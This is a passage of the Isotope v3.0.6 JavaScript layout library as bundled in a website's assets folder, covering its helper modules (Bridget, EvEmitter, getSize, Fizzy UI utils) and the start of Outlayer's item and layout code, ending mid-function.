;;assets/js/jquery.isotope.min.jsnu[/*! * Isotope PACKAGED v3.0.6 * * Licensed GPLv3 for open source use * or Isotope Commercial License for commercial use * * https://isotope.metafizzy.co * Copyright 2010-2018 Metafizzy */ /** * Bridget makes jQuery widgets * v2.0.1 * MIT license */ /* jshint browser: true, strict: true, undef: true, unused: true */ ( function( window, factory ) { // universal module definition /*jshint strict: false */ /* globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'jquery-bridget/jquery-bridget',[ 'jquery' ], function( jQuery ) { return factory( window, jQuery ); }); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( window, require('jquery') ); } else { // browser global window.jQueryBridget = factory( window, window.jQuery ); } }( window, function factory( window, jQuery ) { 'use strict'; // ----- utils ----- // var arraySlice = Array.prototype.slice; // helper function for logging errors // $.error breaks jQuery chaining var console = window.console; var logError = typeof console == 'undefined' ? function() {} : function( message ) { console.error( message ); }; // ----- jQueryBridget ----- // function jQueryBridget( namespace, PluginClass, $ ) { $ = $ || jQuery || window.jQuery; if ( !$ ) { return; } // add option method -> $().plugin('option', {...}) if ( !PluginClass.prototype.option ) { // option setter PluginClass.prototype.option = function( opts ) { // bail out if not an object if ( !$.isPlainObject( opts ) ){ return; } this.options = $.extend( true, this.options, opts ); }; } // make jQuery plugin $.fn[ namespace ] = function( arg0 /*, arg1 */ ) { if ( typeof arg0 == 'string' ) { // method call $().plugin( 'methodName', { options } ) // shift arguments by 1 var args = arraySlice.call( arguments, 1 ); return methodCall( this, arg0, args ); } // just $().plugin({ options }) plainCall( this, arg0 ); return this; }; // $().plugin('methodName') function methodCall( $elems, methodName, args ) { var returnValue; var pluginMethodStr = '$().' + namespace + '("' + methodName + '")'; $elems.each( function( i, elem ) { // get instance var instance = $.data( elem, namespace ); if ( !instance ) { logError( namespace + ' not initialized. Cannot call methods, i.e. ' + pluginMethodStr ); return; } var method = instance[ methodName ]; if ( !method || methodName.charAt(0) == '_' ) { logError( pluginMethodStr + ' is not a valid method' ); return; } // apply method, get return value var value = method.apply( instance, args ); // set return value if value is returned, use only first value returnValue = returnValue === undefined ? value : returnValue; }); return returnValue !== undefined ? returnValue : $elems; } function plainCall( $elems, options ) { $elems.each( function( i, elem ) { var instance = $.data( elem, namespace ); if ( instance ) { // set options & init instance.option( options ); instance._init(); } else { // initialize new instance instance = new PluginClass( elem, options ); $.data( elem, namespace, instance ); } }); } updateJQuery( $ ); } // ----- updateJQuery ----- // // set $.bridget for v1 backwards compatibility function updateJQuery( $ ) { if ( !$ || ( $ && $.bridget ) ) { return; } $.bridget = jQueryBridget; } updateJQuery( jQuery || window.jQuery ); // ----- ----- // return jQueryBridget; })); /** * EvEmitter v1.1.0 * Lil' event emitter * MIT License */ /* jshint unused: true, undef: true, strict: true */ ( function( global, factory ) { // universal module definition /* jshint strict: false */ /* globals define, module, window */ if ( typeof define == 'function' && define.amd ) { // AMD - RequireJS define( 'ev-emitter/ev-emitter',factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS - Browserify, Webpack module.exports = factory(); } else { // Browser globals global.EvEmitter = factory(); } }( typeof window != 'undefined' ? window : this, function() { function EvEmitter() {} var proto = EvEmitter.prototype; proto.on = function( eventName, listener ) { if ( !eventName || !listener ) { return; } // set events hash var events = this._events = this._events || {}; // set listeners array var listeners = events[ eventName ] = events[ eventName ] || []; // only add once if ( listeners.indexOf( listener ) == -1 ) { listeners.push( listener ); } return this; }; proto.once = function( eventName, listener ) { if ( !eventName || !listener ) { return; } // add event this.on( eventName, listener ); // set once flag // set onceEvents hash var onceEvents = this._onceEvents = this._onceEvents || {}; // set onceListeners object var onceListeners = onceEvents[ eventName ] = onceEvents[ eventName ] || {}; // set flag onceListeners[ listener ] = true; return this; }; proto.off = function( eventName, listener ) { var listeners = this._events && this._events[ eventName ]; if ( !listeners || !listeners.length ) { return; } var index = listeners.indexOf( listener ); if ( index != -1 ) { listeners.splice( index, 1 ); } return this; }; proto.emitEvent = function( eventName, args ) { var listeners = this._events && this._events[ eventName ]; if ( !listeners || !listeners.length ) { return; } // copy over to avoid interference if .off() in listener listeners = listeners.slice(0); args = args || []; // once stuff var onceListeners = this._onceEvents && this._onceEvents[ eventName ]; for ( var i=0; i < listeners.length; i++ ) { var listener = listeners[i] var isOnce = onceListeners && onceListeners[ listener ]; if ( isOnce ) { // remove listener // remove before trigger to prevent recursion this.off( eventName, listener ); // unset once flag delete onceListeners[ listener ]; } // trigger listener listener.apply( this, args ); } return this; }; proto.allOff = function() { delete this._events; delete this._onceEvents; }; return EvEmitter; })); /*! * getSize v2.0.3 * measure size of elements * MIT license */ /* jshint browser: true, strict: true, undef: true, unused: true */ /* globals console: false */ ( function( window, factory ) { /* jshint strict: false */ /* globals define, module */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'get-size/get-size',factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory(); } else { // browser global window.getSize = factory(); } })( window, function factory() { 'use strict'; // -------------------------- helpers -------------------------- // // get a number from a string, not a percentage function getStyleSize( value ) { var num = parseFloat( value ); // not a percent like '100%', and a number var isValid = value.indexOf('%') == -1 && !isNaN( num ); return isValid && num; } function noop() {} var logError = typeof console == 'undefined' ? noop : function( message ) { console.error( message ); }; // -------------------------- measurements -------------------------- // var measurements = [ 'paddingLeft', 'paddingRight', 'paddingTop', 'paddingBottom', 'marginLeft', 'marginRight', 'marginTop', 'marginBottom', 'borderLeftWidth', 'borderRightWidth', 'borderTopWidth', 'borderBottomWidth' ]; var measurementsLength = measurements.length; function getZeroSize() { var size = { width: 0, height: 0, innerWidth: 0, innerHeight: 0, outerWidth: 0, outerHeight: 0 }; for ( var i=0; i < measurementsLength; i++ ) { var measurement = measurements[i]; size[ measurement ] = 0; } return size; } // -------------------------- getStyle -------------------------- // /** * getStyle, get style of element, check for Firefox bug * https://bugzilla.mozilla.org/show_bug.cgi?id=548397 */ function getStyle( elem ) { var style = getComputedStyle( elem ); if ( !style ) { logError( 'Style returned ' + style + '. Are you running this code in a hidden iframe on Firefox? ' + 'See https://bit.ly/getsizebug1' ); } return style; } // -------------------------- setup -------------------------- // var isSetup = false; var isBoxSizeOuter; /** * setup * check isBoxSizerOuter * do on first getSize() rather than on page load for Firefox bug */ function setup() { // setup once if ( isSetup ) { return; } isSetup = true; // -------------------------- box sizing -------------------------- // /** * Chrome & Safari measure the outer-width on style.width on border-box elems * IE11 & Firefox<29 measures the inner-width */ var div = document.createElement('div'); div.style.width = '200px'; div.style.padding = '1px 2px 3px 4px'; div.style.borderStyle = 'solid'; div.style.borderWidth = '1px 2px 3px 4px'; div.style.boxSizing = 'border-box'; var body = document.body || document.documentElement; body.appendChild( div ); var style = getStyle( div ); // round value for browser zoom. desandro/masonry#928 isBoxSizeOuter = Math.round( getStyleSize( style.width ) ) == 200; getSize.isBoxSizeOuter = isBoxSizeOuter; body.removeChild( div ); } // -------------------------- getSize -------------------------- // function getSize( elem ) { setup(); // use querySeletor if elem is string if ( typeof elem == 'string' ) { elem = document.querySelector( elem ); } // do not proceed on non-objects if ( !elem || typeof elem != 'object' || !elem.nodeType ) { return; } var style = getStyle( elem ); // if hidden, everything is 0 if ( style.display == 'none' ) { return getZeroSize(); } var size = {}; size.width = elem.offsetWidth; size.height = elem.offsetHeight; var isBorderBox = size.isBorderBox = style.boxSizing == 'border-box'; // get all measurements for ( var i=0; i < measurementsLength; i++ ) { var measurement = measurements[i]; var value = style[ measurement ]; var num = parseFloat( value ); // any 'auto', 'medium' value will be 0 size[ measurement ] = !isNaN( num ) ? num : 0; } var paddingWidth = size.paddingLeft + size.paddingRight; var paddingHeight = size.paddingTop + size.paddingBottom; var marginWidth = size.marginLeft + size.marginRight; var marginHeight = size.marginTop + size.marginBottom; var borderWidth = size.borderLeftWidth + size.borderRightWidth; var borderHeight = size.borderTopWidth + size.borderBottomWidth; var isBorderBoxSizeOuter = isBorderBox && isBoxSizeOuter; // overwrite width and height if we can get it from style var styleWidth = getStyleSize( style.width ); if ( styleWidth !== false ) { size.width = styleWidth + // add padding and border unless it's already including it ( isBorderBoxSizeOuter ? 0 : paddingWidth + borderWidth ); } var styleHeight = getStyleSize( style.height ); if ( styleHeight !== false ) { size.height = styleHeight + // add padding and border unless it's already including it ( isBorderBoxSizeOuter ? 0 : paddingHeight + borderHeight ); } size.innerWidth = size.width - ( paddingWidth + borderWidth ); size.innerHeight = size.height - ( paddingHeight + borderHeight ); size.outerWidth = size.width + marginWidth; size.outerHeight = size.height + marginHeight; return size; } return getSize; }); /** * matchesSelector v2.0.2 * matchesSelector( element, '.selector' ) * MIT license */ /*jshint browser: true, strict: true, undef: true, unused: true */ ( function( window, factory ) { /*global define: false, module: false */ 'use strict'; // universal module definition if ( typeof define == 'function' && define.amd ) { // AMD define( 'desandro-matches-selector/matches-selector',factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory(); } else { // browser global window.matchesSelector = factory(); } }( window, function factory() { 'use strict'; var matchesMethod = ( function() { var ElemProto = window.Element.prototype; // check for the standard method name first if ( ElemProto.matches ) { return 'matches'; } // check un-prefixed if ( ElemProto.matchesSelector ) { return 'matchesSelector'; } // check vendor prefixes var prefixes = [ 'webkit', 'moz', 'ms', 'o' ]; for ( var i=0; i < prefixes.length; i++ ) { var prefix = prefixes[i]; var method = prefix + 'MatchesSelector'; if ( ElemProto[ method ] ) { return method; } } })(); return function matchesSelector( elem, selector ) { return elem[ matchesMethod ]( selector ); }; })); /** * Fizzy UI utils v2.0.7 * MIT license */ /*jshint browser: true, undef: true, unused: true, strict: true */ ( function( window, factory ) { // universal module definition /*jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'fizzy-ui-utils/utils',[ 'desandro-matches-selector/matches-selector' ], function( matchesSelector ) { return factory( window, matchesSelector ); }); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( window, require('desandro-matches-selector') ); } else { // browser global window.fizzyUIUtils = factory( window, window.matchesSelector ); } }( window, function factory( window, matchesSelector ) { var utils = {}; // ----- extend ----- // // extends objects utils.extend = function( a, b ) { for ( var prop in b ) { a[ prop ] = b[ prop ]; } return a; }; // ----- modulo ----- // utils.modulo = function( num, div ) { return ( ( num % div ) + div ) % div; }; // ----- makeArray ----- // var arraySlice = Array.prototype.slice; // turn element or nodeList into an array utils.makeArray = function( obj ) { if ( Array.isArray( obj ) ) { // use object if already an array return obj; } // return empty array if undefined or null. #6 if ( obj === null || obj === undefined ) { return []; } var isArrayLike = typeof obj == 'object' && typeof obj.length == 'number'; if ( isArrayLike ) { // convert nodeList to array return arraySlice.call( obj ); } // array of single index return [ obj ]; }; // ----- removeFrom ----- // utils.removeFrom = function( ary, obj ) { var index = ary.indexOf( obj ); if ( index != -1 ) { ary.splice( index, 1 ); } }; // ----- getParent ----- // utils.getParent = function( elem, selector ) { while ( elem.parentNode && elem != document.body ) { elem = elem.parentNode; if ( matchesSelector( elem, selector ) ) { return elem; } } }; // ----- getQueryElement ----- // // use element as selector string utils.getQueryElement = function( elem ) { if ( typeof elem == 'string' ) { return document.querySelector( elem ); } return elem; }; // ----- handleEvent ----- // // enable .ontype to trigger from .addEventListener( elem, 'type' ) utils.handleEvent = function( event ) { var method = 'on' + event.type; if ( this[ method ] ) { this[ method ]( event ); } }; // ----- filterFindElements ----- // utils.filterFindElements = function( elems, selector ) { // make array of elems elems = utils.makeArray( elems ); var ffElems = []; elems.forEach( function( elem ) { // check that elem is an actual element if ( !( elem instanceof HTMLElement ) ) { return; } // add elem if no selector if ( !selector ) { ffElems.push( elem ); return; } // filter & find items if we have a selector // filter if ( matchesSelector( elem, selector ) ) { ffElems.push( elem ); } // find children var childElems = elem.querySelectorAll( selector ); // concat childElems to filterFound array for ( var i=0; i < childElems.length; i++ ) { ffElems.push( childElems[i] ); } }); return ffElems; }; // ----- debounceMethod ----- // utils.debounceMethod = function( _class, methodName, threshold ) { threshold = threshold || 100; // original method var method = _class.prototype[ methodName ]; var timeoutName = methodName + 'Timeout'; _class.prototype[ methodName ] = function() { var timeout = this[ timeoutName ]; clearTimeout( timeout ); var args = arguments; var _this = this; this[ timeoutName ] = setTimeout( function() { method.apply( _this, args ); delete _this[ timeoutName ]; }, threshold ); }; }; // ----- docReady ----- // utils.docReady = function( callback ) { var readyState = document.readyState; if ( readyState == 'complete' || readyState == 'interactive' ) { // do async to allow for other scripts to run. metafizzy/flickity#441 setTimeout( callback ); } else { document.addEventListener( 'DOMContentLoaded', callback ); } }; // ----- htmlInit ----- // // http://jamesroberts.name/blog/2010/02/22/string-functions-for-javascript-trim-to-camel-case-to-dashed-and-to-underscore/ utils.toDashed = function( str ) { return str.replace( /(.)([A-Z])/g, function( match, $1, $2 ) { return $1 + '-' + $2; }).toLowerCase(); }; var console = window.console; /** * allow user to initialize classes via [data-namespace] or .js-namespace class * htmlInit( Widget, 'widgetName' ) * options are parsed from data-namespace-options */ utils.htmlInit = function( WidgetClass, namespace ) { utils.docReady( function() { var dashedNamespace = utils.toDashed( namespace ); var dataAttr = 'data-' + dashedNamespace; var dataAttrElems = document.querySelectorAll( '[' + dataAttr + ']' ); var jsDashElems = document.querySelectorAll( '.js-' + dashedNamespace ); var elems = utils.makeArray( dataAttrElems ) .concat( utils.makeArray( jsDashElems ) ); var dataOptionsAttr = dataAttr + '-options'; var jQuery = window.jQuery; elems.forEach( function( elem ) { var attr = elem.getAttribute( dataAttr ) || elem.getAttribute( dataOptionsAttr ); var options; try { options = attr && JSON.parse( attr ); } catch ( error ) { // log error, do not initialize if ( console ) { console.error( 'Error parsing ' + dataAttr + ' on ' + elem.className + ': ' + error ); } return; } // initialize var instance = new WidgetClass( elem, options ); // make available via $().data('namespace') if ( jQuery ) { jQuery.data( elem, namespace, instance ); } }); }); }; // ----- ----- // return utils; })); /** * Outlayer Item */ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /* globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD - RequireJS define( 'outlayer/item',[ 'ev-emitter/ev-emitter', 'get-size/get-size' ], factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS - Browserify, Webpack module.exports = factory( require('ev-emitter'), require('get-size') ); } else { // browser global window.Outlayer = {}; window.Outlayer.Item = factory( window.EvEmitter, window.getSize ); } }( window, function factory( EvEmitter, getSize ) { 'use strict'; // ----- helpers ----- // function isEmptyObj( obj ) { for ( var prop in obj ) { return false; } prop = null; return true; } // -------------------------- CSS3 support -------------------------- // var docElemStyle = document.documentElement.style; var transitionProperty = typeof docElemStyle.transition == 'string' ? 'transition' : 'WebkitTransition'; var transformProperty = typeof docElemStyle.transform == 'string' ? 'transform' : 'WebkitTransform'; var transitionEndEvent = { WebkitTransition: 'webkitTransitionEnd', transition: 'transitionend' }[ transitionProperty ]; // cache all vendor properties that could have vendor prefix var vendorProperties = { transform: transformProperty, transition: transitionProperty, transitionDuration: transitionProperty + 'Duration', transitionProperty: transitionProperty + 'Property', transitionDelay: transitionProperty + 'Delay' }; // -------------------------- Item -------------------------- // function Item( element, layout ) { if ( !element ) { return; } this.element = element; // parent layout class, i.e. Masonry, Isotope, or Packery this.layout = layout; this.position = { x: 0, y: 0 }; this._create(); } // inherit EvEmitter var proto = Item.prototype = Object.create( EvEmitter.prototype ); proto.constructor = Item; proto._create = function() { // transition objects this._transn = { ingProperties: {}, clean: {}, onEnd: {} }; this.css({ position: 'absolute' }); }; // trigger specified handler for event type proto.handleEvent = function( event ) { var method = 'on' + event.type; if ( this[ method ] ) { this[ method ]( event ); } }; proto.getSize = function() { this.size = getSize( this.element ); }; /** * apply CSS styles to element * @param {Object} style */ proto.css = function( style ) { var elemStyle = this.element.style; for ( var prop in style ) { // use vendor property if available var supportedProp = vendorProperties[ prop ] || prop; elemStyle[ supportedProp ] = style[ prop ]; } }; // measure position, and sets it proto.getPosition = function() { var style = getComputedStyle( this.element ); var isOriginLeft = this.layout._getOption('originLeft'); var isOriginTop = this.layout._getOption('originTop'); var xValue = style[ isOriginLeft ? 'left' : 'right' ]; var yValue = style[ isOriginTop ? 'top' : 'bottom' ]; var x = parseFloat( xValue ); var y = parseFloat( yValue ); // convert percent to pixels var layoutSize = this.layout.size; if ( xValue.indexOf('%') != -1 ) { x = ( x / 100 ) * layoutSize.width; } if ( yValue.indexOf('%') != -1 ) { y = ( y / 100 ) * layoutSize.height; } // clean up 'auto' or other non-integer values x = isNaN( x ) ? 0 : x; y = isNaN( y ) ? 0 : y; // remove padding from measurement x -= isOriginLeft ? layoutSize.paddingLeft : layoutSize.paddingRight; y -= isOriginTop ? layoutSize.paddingTop : layoutSize.paddingBottom; this.position.x = x; this.position.y = y; }; // set settled position, apply padding proto.layoutPosition = function() { var layoutSize = this.layout.size; var style = {}; var isOriginLeft = this.layout._getOption('originLeft'); var isOriginTop = this.layout._getOption('originTop'); // x var xPadding = isOriginLeft ? 'paddingLeft' : 'paddingRight'; var xProperty = isOriginLeft ? 'left' : 'right'; var xResetProperty = isOriginLeft ? 'right' : 'left'; var x = this.position.x + layoutSize[ xPadding ]; // set in percentage or pixels style[ xProperty ] = this.getXValue( x ); // reset other property style[ xResetProperty ] = ''; // y var yPadding = isOriginTop ? 'paddingTop' : 'paddingBottom'; var yProperty = isOriginTop ? 'top' : 'bottom'; var yResetProperty = isOriginTop ? 'bottom' : 'top'; var y = this.position.y + layoutSize[ yPadding ]; // set in percentage or pixels style[ yProperty ] = this.getYValue( y ); // reset other property style[ yResetProperty ] = ''; this.css( style ); this.emitEvent( 'layout', [ this ] ); }; proto.getXValue = function( x ) { var isHorizontal = this.layout._getOption('horizontal'); return this.layout.options.percentPosition && !isHorizontal ? ( ( x / this.layout.size.width ) * 100 ) + '%' : x + 'px'; }; proto.getYValue = function( y ) { var isHorizontal = this.layout._getOption('horizontal'); return this.layout.options.percentPosition && isHorizontal ? ( ( y / this.layout.size.height ) * 100 ) + '%' : y + 'px'; }; proto._transitionTo = function( x, y ) { this.getPosition(); // get current x & y from top/left var curX = this.position.x; var curY = this.position.y; var didNotMove = x == this.position.x && y == this.position.y; // save end position this.setPosition( x, y ); // if did not move and not transitioning, just go to layout if ( didNotMove && !this.isTransitioning ) { this.layoutPosition(); return; } var transX = x - curX; var transY = y - curY; var transitionStyle = {}; transitionStyle.transform = this.getTranslate( transX, transY ); this.transition({ to: transitionStyle, onTransitionEnd: { transform: this.layoutPosition }, isCleaning: true }); }; proto.getTranslate = function( x, y ) { // flip cooridinates if origin on right or bottom var isOriginLeft = this.layout._getOption('originLeft'); var isOriginTop = this.layout._getOption('originTop'); x = isOriginLeft ? x : -x; y = isOriginTop ? y : -y; return 'translate3d(' + x + 'px, ' + y + 'px, 0)'; }; // non transition + transform support proto.goTo = function( x, y ) { this.setPosition( x, y ); this.layoutPosition(); }; proto.moveTo = proto._transitionTo; proto.setPosition = function( x, y ) { this.position.x = parseFloat( x ); this.position.y = parseFloat( y ); }; // ----- transition ----- // /** * @param {Object} style - CSS * @param {Function} onTransitionEnd */ // non transition, just trigger callback proto._nonTransition = function( args ) { this.css( args.to ); if ( args.isCleaning ) { this._removeStyles( args.to ); } for ( var prop in args.onTransitionEnd ) { args.onTransitionEnd[ prop ].call( this ); } }; /** * proper transition * @param {Object} args - arguments * @param {Object} to - style to transition to * @param {Object} from - style to start transition from * @param {Boolean} isCleaning - removes transition styles after transition * @param {Function} onTransitionEnd - callback */ proto.transition = function( args ) { // redirect to nonTransition if no transition duration if ( !parseFloat( this.layout.options.transitionDuration ) ) { this._nonTransition( args ); return; } var _transition = this._transn; // keep track of onTransitionEnd callback by css property for ( var prop in args.onTransitionEnd ) { _transition.onEnd[ prop ] = args.onTransitionEnd[ prop ]; } // keep track of properties that are transitioning for ( prop in args.to ) { _transition.ingProperties[ prop ] = true; // keep track of properties to clean up when transition is done if ( args.isCleaning ) { _transition.clean[ prop ] = true; } } // set from styles if ( args.from ) { this.css( args.from ); // force redraw. http://blog.alexmaccaw.com/css-transitions var h = this.element.offsetHeight; // hack for JSHint to hush about unused var h = null; } // enable transition this.enableTransition( args.to ); // set styles that are transitioning this.css( args.to ); this.isTransitioning = true; }; // dash before all cap letters, including first for // WebkitTransform => -webkit-transform function toDashedAll( str ) { return str.replace( /([A-Z])/g, function( $1 ) { return '-' + $1.toLowerCase(); }); } var transitionProps = 'opacity,' + toDashedAll( transformProperty ); proto.enableTransition = function(/* style */) { // HACK changing transitionProperty during a transition // will cause transition to jump if ( this.isTransitioning ) { return; } // make `transition: foo, bar, baz` from style object // HACK un-comment this when enableTransition can work // while a transition is happening // var transitionValues = []; // for ( var prop in style ) { // // dash-ify camelCased properties like WebkitTransition // prop = vendorProperties[ prop ] || prop; // transitionValues.push( toDashedAll( prop ) ); // } // munge number to millisecond, to match stagger var duration = this.layout.options.transitionDuration; duration = typeof duration == 'number' ? duration + 'ms' : duration; // enable transition styles this.css({ transitionProperty: transitionProps, transitionDuration: duration, transitionDelay: this.staggerDelay || 0 }); // listen for transition end event this.element.addEventListener( transitionEndEvent, this, false ); }; // ----- events ----- // proto.onwebkitTransitionEnd = function( event ) { this.ontransitionend( event ); }; proto.onotransitionend = function( event ) { this.ontransitionend( event ); }; // properties that I munge to make my life easier var dashedVendorProperties = { '-webkit-transform': 'transform' }; proto.ontransitionend = function( event ) { // disregard bubbled events from children if ( event.target !== this.element ) { return; } var _transition = this._transn; // get property name of transitioned property, convert to prefix-free var propertyName = dashedVendorProperties[ event.propertyName ] || event.propertyName; // remove property that has completed transitioning delete _transition.ingProperties[ propertyName ]; // check if any properties are still transitioning if ( isEmptyObj( _transition.ingProperties ) ) { // all properties have completed transitioning this.disableTransition(); } // clean style if ( propertyName in _transition.clean ) { // clean up style this.element.style[ event.propertyName ] = ''; delete _transition.clean[ propertyName ]; } // trigger onTransitionEnd callback if ( propertyName in _transition.onEnd ) { var onTransitionEnd = _transition.onEnd[ propertyName ]; onTransitionEnd.call( this ); delete _transition.onEnd[ propertyName ]; } this.emitEvent( 'transitionEnd', [ this ] ); }; proto.disableTransition = function() { this.removeTransitionStyles(); this.element.removeEventListener( transitionEndEvent, this, false ); this.isTransitioning = false; }; /** * removes style property from element * @param {Object} style **/ proto._removeStyles = function( style ) { // clean up transition styles var cleanStyle = {}; for ( var prop in style ) { cleanStyle[ prop ] = ''; } this.css( cleanStyle ); }; var cleanTransitionStyle = { transitionProperty: '', transitionDuration: '', transitionDelay: '' }; proto.removeTransitionStyles = function() { // remove transition this.css( cleanTransitionStyle ); }; // ----- stagger ----- // proto.stagger = function( delay ) { delay = isNaN( delay ) ? 0 : delay; this.staggerDelay = delay + 'ms'; }; // ----- show/hide/remove ----- // // remove element from DOM proto.removeElem = function() { this.element.parentNode.removeChild( this.element ); // remove display: none this.css({ display: '' }); this.emitEvent( 'remove', [ this ] ); }; proto.remove = function() { // just remove element if no transition support or no transition if ( !transitionProperty || !parseFloat( this.layout.options.transitionDuration ) ) { this.removeElem(); return; } // start transition this.once( 'transitionEnd', function() { this.removeElem(); }); this.hide(); }; proto.reveal = function() { delete this.isHidden; // remove display: none this.css({ display: '' }); var options = this.layout.options; var onTransitionEnd = {}; var transitionEndProperty = this.getHideRevealTransitionEndProperty('visibleStyle'); onTransitionEnd[ transitionEndProperty ] = this.onRevealTransitionEnd; this.transition({ from: options.hiddenStyle, to: options.visibleStyle, isCleaning: true, onTransitionEnd: onTransitionEnd }); }; proto.onRevealTransitionEnd = function() { // check if still visible // during transition, item may have been hidden if ( !this.isHidden ) { this.emitEvent('reveal'); } }; /** * get style property use for hide/reveal transition end * @param {String} styleProperty - hiddenStyle/visibleStyle * @returns {String} */ proto.getHideRevealTransitionEndProperty = function( styleProperty ) { var optionStyle = this.layout.options[ styleProperty ]; // use opacity if ( optionStyle.opacity ) { return 'opacity'; } // get first property for ( var prop in optionStyle ) { return prop; } }; proto.hide = function() { // set flag this.isHidden = true; // remove display: none this.css({ display: '' }); var options = this.layout.options; var onTransitionEnd = {}; var transitionEndProperty = this.getHideRevealTransitionEndProperty('hiddenStyle'); onTransitionEnd[ transitionEndProperty ] = this.onHideTransitionEnd; this.transition({ from: options.visibleStyle, to: options.hiddenStyle, // keep hidden stuff hidden isCleaning: true, onTransitionEnd: onTransitionEnd }); }; proto.onHideTransitionEnd = function() { // check if still hidden // during transition, item may have been un-hidden if ( this.isHidden ) { this.css({ display: 'none' }); this.emitEvent('hide'); } }; proto.destroy = function() { this.css({ position: '', left: '', right: '', top: '', bottom: '', transition: '', transform: '' }); }; return Item; })); /*! * Outlayer v2.1.1 * the brains and guts of a layout library * MIT license */ ( function( window, factory ) { 'use strict'; // universal module definition /* jshint strict: false */ /* globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD - RequireJS define( 'outlayer/outlayer',[ 'ev-emitter/ev-emitter', 'get-size/get-size', 'fizzy-ui-utils/utils', './item' ], function( EvEmitter, getSize, utils, Item ) { return factory( window, EvEmitter, getSize, utils, Item); } ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS - Browserify, Webpack module.exports = factory( window, require('ev-emitter'), require('get-size'), require('fizzy-ui-utils'), require('./item') ); } else { // browser global window.Outlayer = factory( window, window.EvEmitter, window.getSize, window.fizzyUIUtils, window.Outlayer.Item ); } }( window, function factory( window, EvEmitter, getSize, utils, Item ) { 'use strict'; // ----- vars ----- // var console = window.console; var jQuery = window.jQuery; var noop = function() {}; // -------------------------- Outlayer -------------------------- // // globally unique identifiers var GUID = 0; // internal store of all Outlayer intances var instances = {}; /** * @param {Element, String} element * @param {Object} options * @constructor */ function Outlayer( element, options ) { var queryElement = utils.getQueryElement( element ); if ( !queryElement ) { if ( console ) { console.error( 'Bad element for ' + this.constructor.namespace + ': ' + ( queryElement || element ) ); } return; } this.element = queryElement; // add jQuery if ( jQuery ) { this.$element = jQuery( this.element ); } // options this.options = utils.extend( {}, this.constructor.defaults ); this.option( options ); // add id for Outlayer.getFromElement var id = ++GUID; this.element.outlayerGUID = id; // expando instances[ id ] = this; // associate via id // kick it off this._create(); var isInitLayout = this._getOption('initLayout'); if ( isInitLayout ) { this.layout(); } } // settings are for internal use only Outlayer.namespace = 'outlayer'; Outlayer.Item = Item; // default options Outlayer.defaults = { containerStyle: { position: 'relative' }, initLayout: true, originLeft: true, originTop: true, resize: true, resizeContainer: true, // item options transitionDuration: '0.4s', hiddenStyle: { opacity: 0, transform: 'scale(0.001)' }, visibleStyle: { opacity: 1, transform: 'scale(1)' } }; var proto = Outlayer.prototype; // inherit EvEmitter utils.extend( proto, EvEmitter.prototype ); /** * set options * @param {Object} opts */ proto.option = function( opts ) { utils.extend( this.options, opts ); }; /** * get backwards compatible option value, check old name */ proto._getOption = function( option ) { var oldOption = this.constructor.compatOptions[ option ]; return oldOption && this.options[ oldOption ] !== undefined ? this.options[ oldOption ] : this.options[ option ]; }; Outlayer.compatOptions = { // currentName: oldName initLayout: 'isInitLayout', horizontal: 'isHorizontal', layoutInstant: 'isLayoutInstant', originLeft: 'isOriginLeft', originTop: 'isOriginTop', resize: 'isResizeBound', resizeContainer: 'isResizingContainer' }; proto._create = function() { // get items from children this.reloadItems(); // elements that affect layout, but are not laid out this.stamps = []; this.stamp( this.options.stamp ); // set container style utils.extend( this.element.style, this.options.containerStyle ); // bind resize method var canBindResize = this._getOption('resize'); if ( canBindResize ) { this.bindResize(); } }; // goes through all children again and gets bricks in proper order proto.reloadItems = function() { // collection of item elements this.items = this._itemize( this.element.children ); }; /** * turn elements into Outlayer.Items to be used in layout * @param {Array or NodeList or HTMLElement} elems * @returns {Array} items - collection of new Outlayer Items */ proto._itemize = function( elems ) { var itemElems = this._filterFindItemElements( elems ); var Item = this.constructor.Item; // create new Outlayer Items for collection var items = []; for ( var i=0; i < itemElems.length; i++ ) { var elem = itemElems[i]; var item = new Item( elem, this ); items.push( item ); } return items; }; /** * get item elements to be used in layout * @param {Array or NodeList or HTMLElement} elems * @returns {Array} items - item elements */ proto._filterFindItemElements = function( elems ) { return utils.filterFindElements( elems, this.options.itemSelector ); }; /** * getter method for getting item elements * @returns {Array} elems - collection of item elements */ proto.getItemElements = function() { return this.items.map( function( item ) { return item.element; }); }; // ----- init & layout ----- // /** * lays out all items */ proto.layout = function() { this._resetLayout(); this._manageStamps(); // don't animate first layout var layoutInstant = this._getOption('layoutInstant'); var isInstant = layoutInstant !== undefined ? layoutInstant : !this._isLayoutInited; this.layoutItems( this.items, isInstant ); // flag for initalized this._isLayoutInited = true; }; // _init is alias for layout proto._init = proto.layout; /** * logic before any new layout */ proto._resetLayout = function() { this.getSize(); }; proto.getSize = function() { this.size = getSize( this.element ); }; /** * get measurement from option, for columnWidth, rowHeight, gutter * if option is String -> get element from selector string, & get size of element * if option is Element -> get size of element * else use option as a number * * @param {String} measurement * @param {String} size - width or height * @private */ proto._getMeasurement = function( measurement, size ) { var option = this.options[ measurement ]; var elem; if ( !option ) { // default to 0 this[ measurement ] = 0; } else { // use option as an element if ( typeof option == 'string' ) { elem = this.element.querySelector( option ); } else if ( option instanceof HTMLElement ) { elem = option; } // use size of element, if element this[ measurement ] = elem ? getSize( elem )[ size ] : option; } }; /** * layout a collection of item elements * @api public */ proto.layoutItems = function( items, isInstant ) { items = this._getItemsForLayout( items ); this._layoutItems( items, isInstant ); this._postLayout(); }; /** * get the items to be laid out * you may want to skip over some items * @param {Array} items * @returns {Array} items */ proto._getItemsForLayout = function( items ) { return items.filter( function( item ) { return !item.isIgnored; }); }; /** * layout items * @param {Array} items * @param {Boolean} isInstant */ proto._layoutItems = function( items, isInstant ) { this._emitCompleteOnItems( 'layout', items ); if ( !items || !items.length ) { // no items, emit event with empty array return; } var queue = []; items.forEach( function( item ) { // get x/y object from method var position = 